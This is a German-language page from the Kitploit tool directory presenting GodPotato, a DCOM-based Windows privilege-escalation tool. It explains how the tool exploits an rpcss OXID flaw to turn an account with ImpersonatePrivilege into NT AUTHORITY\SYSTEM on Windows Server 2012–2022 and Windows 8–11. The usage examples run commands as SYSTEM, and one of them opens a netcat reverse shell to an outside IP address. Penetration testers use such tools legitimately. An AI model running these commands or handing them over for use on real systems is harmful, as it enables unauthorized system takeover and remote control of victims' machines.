Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
GodPotato — DCOM-basiertes Privilegieneskalationstool für Windows Server 2012-2022 und Windows 8-11, das Benutzer mit ImpersonatePrivilege über die rpcss-oxid-Sicherheitslücke auf NT AUTHORITY\SYSTEM erhöht. | Kitploit
Tools/GitHubGitHub/beichendream/godpotato
Privilege EscalationExploitationPost-ExploitationPenetrationstests
GitHubbeichendream/godpotato

GodPotato

DCOM-basiertes Privilegieneskalationstool für Windows Server 2012-2022 und Windows 8-11, das Benutzer mit ImpersonatePrivilege über die rpcss-oxid-Sicherheitslücke auf NT AUTHORITY\SYSTEM erhöht.

Repository anzeigen
2.3k27329vor 2 JahrenVon Kitploit geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

GodPotato

Basierend auf der Geschichte der Potato-Privilege-Eskalation der letzten 6 Jahre, vom Anfang von RottenPotato bis zum Ende von JuicyPotatoNG, habe ich durch die Erforschung von DCOM eine neue Technologie entdeckt, die eine Privilege-Eskalation unter Windows 2012 bis Windows 2022 ermöglicht. Vorausgesetzt, Sie haben die Berechtigung "ImpersonatePrivilege". Dann sind Sie "NT AUTHORITY\SYSTEM", in der Regel haben WEB-Dienste und Datenbankdienste die Berechtigung "ImpersonatePrivilege".

Die Potato-Privilege-Eskalation wird normalerweise verwendet, wenn wir WEB/Datenbank-Berechtigungen erhalten. Wir können einen Dienstbenutzer mit niedrigen Berechtigungen auf "NT AUTHORITY\SYSTEM"-Berechtigungen anheben. Allerdings hat das historische Potato keine Möglichkeit, auf den neuesten Windows-Systemen zu laufen. Als ich DCOM erforschte, fand ich eine neue Methode, die eine Privilege-Eskalation durchführen kann. Es gibt einige Defekte in rpcss beim Umgang mit oxid, und rpcss ist ein Dienst, der vom System geöffnet werden muss. Daher kann es auf fast jedem Windows-Betriebssystem ausgeführt werden. Ich habe es GodPotato genannt.

Betroffene Versionen

Windows Server 2012 - Windows Server 2022 Windows8 - Windows 11

Beispiel

root@kitploit:~

    FFFFF                   FFF  FFFFFFF
   FFFFFFF                  FFF  FFFFFFFF
  FFF  FFFF                 FFF  FFF   FFF             FFF                  FFF
  FFF   FFF                 FFF  FFF   FFF             FFF                  FFF
  FFF   FFF                 FFF  FFF   FFF             FFF                  FFF
 FFFF        FFFFFFF   FFFFFFFF  FFF   FFF  FFFFFFF  FFFFFFFFF   FFFFFF  FFFFFFFFF    FFFFFF
 FFFF       FFFF FFFF  FFF FFFF  FFF  FFFF FFFF FFFF   FFF      FFF  FFF    FFF      FFF FFFF
 FFFF FFFFF FFF   FFF FFF   FFF  FFFFFFFF  FFF   FFF   FFF      F    FFF    FFF     FFF   FFF
 FFFF   FFF FFF   FFFFFFF   FFF  FFF      FFFF   FFF   FFF         FFFFF    FFF     FFF   FFFF
 FFFF   FFF FFF   FFFFFFF   FFF  FFF      FFFF   FFF   FFF      FFFFFFFF    FFF     FFF   FFFF
  FFF   FFF FFF   FFF FFF   FFF  FFF       FFF   FFF   FFF     FFFF  FFF    FFF     FFF   FFFF
  FFFF FFFF FFFF  FFF FFFF  FFF  FFF       FFF  FFFF   FFF     FFFF  FFF    FFF     FFFF  FFF
   FFFFFFFF  FFFFFFF   FFFFFFFF  FFF        FFFFFFF     FFFFFF  FFFFFFFF    FFFFFFF  FFFFFFF
    FFFFFFF   FFFFF     FFFFFFF  FFF         FFFFF       FFFFF   FFFFFFFF     FFFF     FFFF


Argumente:

        -cmd Erforderlich:True Befehlszeile (Standard cmd /c whoami)

Beispiel:

GodPotato -cmd "cmd /c whoami"


Verwenden Sie die integrierte Clsid des Programms für die Privilege-Eskalation und führen Sie einen einfachen Befehl aus

root@kitploit:~
GodPotato -cmd "cmd /c whoami"

Passen Sie Clsid an und führen Sie Befehle aus

root@kitploit:~
GodPotato -cmd "cmd /c whoami"

Führen Sie Reverse-Shell-Befehle aus

root@kitploit:~
GodPotato -cmd "nc -t -e C:\Windows\System32\cmd.exe 192.168.1.102 2012"

Danksagung

zcgonvh

skay

Lizenz

Apache License 2.0

Tool herunterladen